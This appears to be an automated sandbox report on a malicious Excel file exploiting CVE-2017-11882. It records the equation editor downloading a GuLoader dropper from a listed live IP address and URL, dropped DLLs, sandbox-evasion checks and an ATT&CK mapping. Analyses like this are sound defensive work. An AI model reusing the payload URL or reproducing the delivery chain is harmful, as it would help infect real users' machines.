    Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.4.dr
    Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.4.dr

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000004.00000002.1159273046.0000000003A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 4_2_734F30C0 push eax; ret 4_2_734F30EE
    Source: wxbase30u_xml_gcc_custom.dll.4.drStatic PE information: section name: .xdata
    Source: C:\Users\Public\vbc.exeCode function: 4_2_734F1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,4_2_734F1BFF
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570435 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03570435
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000003A50A78 second address: 0000000003A50A78 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FB704D0F74Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2532Thread sleep time: -240000s >= -30000sJump to behavior
    Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406850 FindFirstFileW,FindClose,4_2_00406850
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405C26
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,4_2_0040290B
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2206
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2235
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2255
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2209
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2305
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2308
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_4-4648
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_4-4804
    Source: EQNEDT32.EXE, 00000002.00000002.957995043.0000000000602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}H
    Source: vbc.exe, 00000004.00000002.1159159152.00000000009C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeCode function: 4_2_734F1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,4_2_734F1BFF
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570540 mov edx, dword ptr fs:[00000030h]2_2_03570540
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040350A
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Scripting
    Path Interception1
    Access Token Manipulation
    111
    Masquerading
    OS Credential Dumping21
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts1
    Native API
    Boot or Logon Initialization Scripts11
    Process Injection
    1
    Disable or Modify Tools
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth33
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts22
    Exploitation for Client Execution
    Logon Script (Windows)1
    Extra Window Memory Injection
    1
    Virtualization/Sandbox Evasion
    Security Account Manager1
    Remote System Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Access Token Manipulation
    NTDS2
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer121
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
    Process Injection
    LSA Secrets15
    System Information Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    Scripting
    Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
    Obfuscated Files or Information
    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
    Extra Window Memory Injection
    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    TransportLabel_6170453602.xlsx39%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe14%MetadefenderBrowse
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe23%ReversingLabsWin32.Downloader.GuLoader
    C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
    http://barsam.com.au/bin_QuCucbUMda229.bin0%Avira URL Cloudsafe
    http://103.149.13.182/msdrive10/.svchost.exe100%Avira URL Cloudmalware
    http://ocsp.sectigo.com00%URL Reputationsafe
    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
    http://103.149.13.182/msdrive10/.svchost.exemmC:0%Avira URL Cloudsafe
    http://103.149.13.182/msdrive10/.svchost.exeigh0%Avira URL Cloudsafe
    http://103.149.13.182/msdrive10/.svchost.exej0%Avira URL Cloudsafe
    https://sectigo.com/CPS0C0%URL Reputationsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://barsam.com.au/bin_QuCucbUMda229.bintrue
    • Avira URL Cloud: safe
    unknown
    http://103.149.13.182/msdrive10/.svchost.exetrue
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0svbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drfalse
    • URL Reputation: safe
    unknown
    http://nsis.sf.net/NSIS_ErrorErrorEQNEDT32.EXE, 00000002.00000002.957995043.0000000000602000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.957102265.000000000040A000.00000008.00000001.01000000.00000004.sdmp, .svchost[1].exe.2.dr, vbc.exe.2.drfalse
      high
      http://ocsp.sectigo.com0vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drfalse
      • URL Reputation: safe
      unknown
      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drfalse
      • URL Reputation: safe
      unknown
      http://103.149.13.182/msdrive10/.svchost.exemmC:EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      http://103.149.13.182/msdrive10/.svchost.exeighEQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      http://103.149.13.182/msdrive10/.svchost.exejEQNEDT32.EXE, 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://sectigo.com/CPS0Cvbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drfalse
      • URL Reputation: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      103.149.13.182
      unknownunknown
      135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:624947
      Start date and time: 12/05/202209:26:392022-05-12 09:26:39 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 59s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:TransportLabel_6170453602.xlsx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winXLSX@4/26@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 85.5% (good quality ratio 84.2%)
      • Quality average: 87%
      • Quality standard deviation: 21.7%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 44
      • Number of non-executed functions: 35
      Cookbook Comments:
      • Found application associated with file extension: .xlsx
      • Adjust boot time
      • Enable AMSI
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: TransportLabel_6170453602.xlsx
      TimeTypeDescription
      09:28:37API Interceptor116x Sleep call for process: EQNEDT32.EXE modified
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      103.149.13.182OR17233976_00019489_20170619154218.xlsxGet hashmaliciousBrowse
      • 103.149.13.182/365space/.svchost.exe
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNJVEdWgNqjA.ps1Get hashmaliciousBrowse
      • 103.133.105.61
      RFQ DOCUMENT.xlsxGet hashmaliciousBrowse
      • 180.214.236.4
      DRAFT SHIPPING DOCUMENTS.xlsxGet hashmaliciousBrowse
      • 103.99.0.198
      Comanda furnizorului-83613.xlsxGet hashmaliciousBrowse
      • 180.214.238.224
      OR17233976_00019489_20170619154218.xlsxGet hashmaliciousBrowse
      • 103.149.13.182
      POFOODEXPO2022.xlsxGet hashmaliciousBrowse
      • 103.149.12.43
      Quotation.xlsxGet hashmaliciousBrowse
      • 103.145.255.4
      NEW ORDER.xlsxGet hashmaliciousBrowse
      • 103.99.0.198
      Quotation Request From Wnsche Group GmbH Germany.xlsxGet hashmaliciousBrowse
      • 103.141.138.195
      pedido_639.xlsxGet hashmaliciousBrowse
      • 103.89.89.198
      PO050522_Airhawk.xlsxGet hashmaliciousBrowse
      • 103.149.12.43
      AWB_NO_9284730932.xlsxGet hashmaliciousBrowse
      • 103.147.185.53
      AWB_NO_9284730932.xlsxGet hashmaliciousBrowse
      • 103.147.185.53
      PR 00120181213.xlsxGet hashmaliciousBrowse
      • 103.89.89.198
      DHL_AWB_NO#907853880911.xlsxGet hashmaliciousBrowse
      • 103.147.185.100
      6kNanOe8YBGet hashmaliciousBrowse
      • 123.31.41.38
      E4HNV1HTPK.exeGet hashmaliciousBrowse
      • 103.147.185.85
      Payment Voucher.xlsxGet hashmaliciousBrowse
      • 103.147.185.85
      IRQ2207798.xlsxGet hashmaliciousBrowse
      • 103.89.89.198
      dEHXEDmi4sGet hashmaliciousBrowse
      • 14.225.246.69
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\Users\user\AppData\Local\Temp\AsSQLHelper.dllOR17233976_00019489_20170619154218.xlsxGet hashmaliciousBrowse
        DWG-1579.exeGet hashmaliciousBrowse
          RFQ-1579.exeGet hashmaliciousBrowse
            DWG-1579.exeGet hashmaliciousBrowse
              RFQ-1579.xlsxGet hashmaliciousBrowse
                C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dllOR17233976_00019489_20170619154218.xlsxGet hashmaliciousBrowse
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Category:downloaded
                  Size (bytes):326847
                  Entropy (8bit):7.537994904334399
                  Encrypted:false
                  SSDEEP:6144:13yztyL/0/bbdat6J9mOnuuAgo+/sOxCHBs4YIwUrJrnBpKussJ9LQu:13pL0/bbdat6JIO1Ag2TBs4YI3BnB35N
                  MD5:D5E55A57372BCAD45FBB260105179CAF
                  SHA1:9B1935A927C072DD31017362FF1739BF1EA2AAF7
                  SHA-256:3C27C2AA1BC826FAA65AB4038EB385CABD6DB50108410E6F674D455AA1DC5532
                  SHA-512:088033564668A4FD3E107566387FECF0B6DCBD7A161C9EF3E4ADB232520467A64AF9EEC740FE783D5C62FA3B79BDD910E72F3ACC838E5FA155427C83003C407B
                  Malicious:true
                  Antivirus:
                  • Antivirus: Metadefender, Detection: 14%, Browse
                  • Antivirus: ReversingLabs, Detection: 23%
                  Reputation:low
                  IE Cache URL:http://103.149.13.182/msdrive10/.svchost.exe
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:......5............@...........................>...........@..........................................`=..Y...........................................................................................................text...pf.......h.................. ..`.rdata...............l..............@..@.data...x.9.........................@....ndata........:..........................rsrc....Y...`=..Z..................@..@................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                  Category:dropped
                  Size (bytes):4396
                  Entropy (8bit):7.884233298494423
                  Encrypted:false
                  SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                  MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                  SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                  SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                  SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):11303
                  Entropy (8bit):7.909402464702408
                  Encrypted:false
                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):2647
                  Entropy (8bit):7.8900124483490135
                  Encrypted:false
                  SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                  MD5:E46357D82EBC866EEBDA98FA8F94B385
                  SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                  SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                  SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                  Category:dropped
                  Size (bytes):4396
                  Entropy (8bit):7.884233298494423
                  Encrypted:false
                  SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                  MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                  SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                  SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                  SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                  Malicious:false
